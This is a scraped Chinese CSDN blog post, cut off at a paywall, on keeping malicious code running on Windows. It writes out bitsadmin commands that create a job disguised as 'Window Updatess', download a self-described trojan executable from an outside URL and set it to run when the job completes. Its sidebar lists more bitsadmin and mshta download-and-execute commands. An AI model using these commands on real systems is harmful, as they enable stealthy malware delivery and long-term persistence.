使用计划任务和bitsadmin实现恶意代码长期控守

最新推荐文章于 2024-07-02 11:05:58 发布
最新推荐文章于 2024-07-02 11:05:58 发布
阅读量8.5k 收藏 4
点赞数
分类专栏: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/57540231
版权

使用计划任务和bitsadmin实现恶意代码长期控守

第一步:文件下载

由于我们想要不被计算器防火墙拦截的下载木马文件,所以考虑使用Windows自带的命令行工具。使用bitsadmin下载工具就可以做到这点。
这是写好保存的.ps1脚本

# 创建一个新的Job,命名为Window Updatess
bitsadmin /Create "Window Updatess"

# 指定一个下载任务和下载的地址
bitsadmin /AddFile "Window Updatess" http://ctf5.shiyanbar.com/423/re/rev2.exe d:\100w.exe

# 设置触发事件的条件
bitsadmin /SetNotifyFlags "Window Updatess" 1

# 设置作业完成数据传输或作业进入状态将运行的命令行程序
bitsadmin /SetNotifyCmdLine "Window Updatess" "%COMSPE
最低0.47元/天 解锁文章
4ct10n
关注
专栏目录
bitsadmin命令(Windows下载文件命令)
墨痕诉清风的博客
07-27 7246
【代码】bitsadmin命令(Windows下载文件命令)
使用BITSadmin下载C#Web文件
04-06
标题中的“使用BITSadmin下载C#Web文件”指的是利用后台智能传输服务(Background Intelligent Transfer Service,简称BITS)的管理工具BITSadmin实现C#编程环境下从Web上下载文件的策略。BITS是一种在Windows...
bitsadmin命令
qq_43776408的博客
10-11 3233
bitsadmin可以下载网上很多资源 1.下载robots存到本地 bitsadmin /rawreturn /transfer down "https://www.jd.com/robots.txt" D:\自己的软件\22.txt 2.如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行 bitsadmin /setpriority 比如high FOREGROUND HI...
渗透新手福利来了:windows下载执行命令大全
最新发布
qq_69775412的博客
07-02 610
参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8。参考:https://github.com/3gstudent/Javascript-Backdoor。将以上保存为downfile.vbs。
内网信息收集与上传下载
技术超强的网络安全平台
12-06 231
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础。 可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿下内网的一台主机后,面对的是一片未知的区域,所以首先要做的就是对当前所处的网络环境进行判断。包括以下几点: 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进行判断 本机信息收集 查看当前用户、权限 whoamiwhoami /all // 查看当前域并获.
Windows7系统bitsadmin.exe文件丢失问题
amio555的专栏
12-29 850
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个bitsadmin.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现bitsadmin.exe丢失要怎么解决?
Windows&Linux文件传输方式总结
热门推荐
st3pby的博客
06-18 1万+
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件传输方式。Windows在本地或者VPS上搭建FTP服务器,通过简单的FTP命令即可实现文件的上传。常用的FTP命令: 例如,我们可以通过在攻击主机上搭建FTP服务,之后在目标主机上通过cmd下的ftp进行远程连接: 首先,在
bitsadmin.exe.mui
01-04
bitsadmin.exe
bitsadmin一句话下载payload(第四十一课).pdf
05-09
1. **恶意软件传播**:攻击者可能会利用BITSAdmin的特性,通过构建恶意的下载任务来传播恶意软件或木马程序。 2. **渗透测试**:安全研究人员和渗透测试工程师可以利用BITSAdmin进行模拟攻击,评估目标系统的安全性...
bitsadmin windwos自带下载命令
浅笑996的博客
06-29 558
bitsadmin的四种下载文件的方法 一、 bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt 二、 bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt 三、 bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\
使用bitsadmin.exe 下载文件,配合bcn.bat玩出更多的花样~~
weixin_34087307的博客
03-08 453
bitsadmin的简单介绍与基本用法: bitsadmin.exe 可以用来在windows 命令行下下载文件。bitsadmin是windows 后台智能传输服务的一个工具,windows 的自动更新,补丁之类的下载就是用这个工具来实现的。 跟据我查到的资料 《Use bitsadmin to maintain persistence and bypass Autoruns》 一文当中对bit...
Windows系统安全相关操作——值得拥有
weixin_45116657的博客
12-06 372
Windows中常见的目录 //这个目录下存放着这个用户开机启动的程序 C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup //这个目录下存放这开机自启的程序 C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp /...
Windows命令之bitsadmin.exe远程下载
haoranhaoshi的博客
04-27 4267
下载: (1)bitsadmin.exe本身被Windows系统支持,无需下载。 执行如下命令可下载http://127.0.0.1:8080/Down/test.txt至C:\Users\hao\Desktop\test.txt: bitsadmin.exe /transfer "test下载" http://127.0.0.1:8080/Down/test.txt C:\Users\ha...
bitsadmin.exe文件丢失导致程序无法运行问题
2301_76755223的博客
05-06 650
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个bitsadmin.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现bitsadmin.exe丢失要怎么解决?
windows下载执行命令大全
weixin_30907523的博客
11-28 1013
1.bitsadmin命令(只能命令下载到指定路径上,win7以上): bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg" bits...
内网渗透-windows权限维持的方法
lza20001103的博客
04-14 1382
内网渗透-windows权限维持的方法
windows渗透大全
weixin_44110913的博客
06-09 2221
目录 Windows发展历史 Windows中常见的目录 Windows常见的cmd命令 Windows中cmd窗口的文件下载(bitsadmin、certutil、iwr) Windows中加载并执行PowerShell脚本  本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows中运行窗口的命令 Window...
bitsadmin 下载文件命令示例
cnbird's blog
12-17 5683
1、bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip 2、bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\
【红队】ATT&CK - 利用BITS服务实现持久化
不忘初心,护天下安全!
07-25 845
对于红队成员来说,BITS拥有一项独一无二的优势,其任务独立保存在BITS数据库内,操作过程不会产生新文件或注册表修改,因此能不被传统工具监控所覆盖。此外,还可以通过创建长期任务,在任务完成或系统重新启动后,调用恶意代码实现持久化。BITS(后台智能传送服务)是一个Windows组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。bitsadmin是一个命令行工具,用于创建下载或上传任务并监视其进度。...
任务管理器bat下载
08-25
使用任务管理器可以帮助用户实时了解计算机的工作状态并进行相应的调整和优化。 要进行任务管理器 BAT 下载,首先需要准备一个批处理脚本文件。批处理脚本文件是一类文本文件,其中包含了一系列命令和指令,可以在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值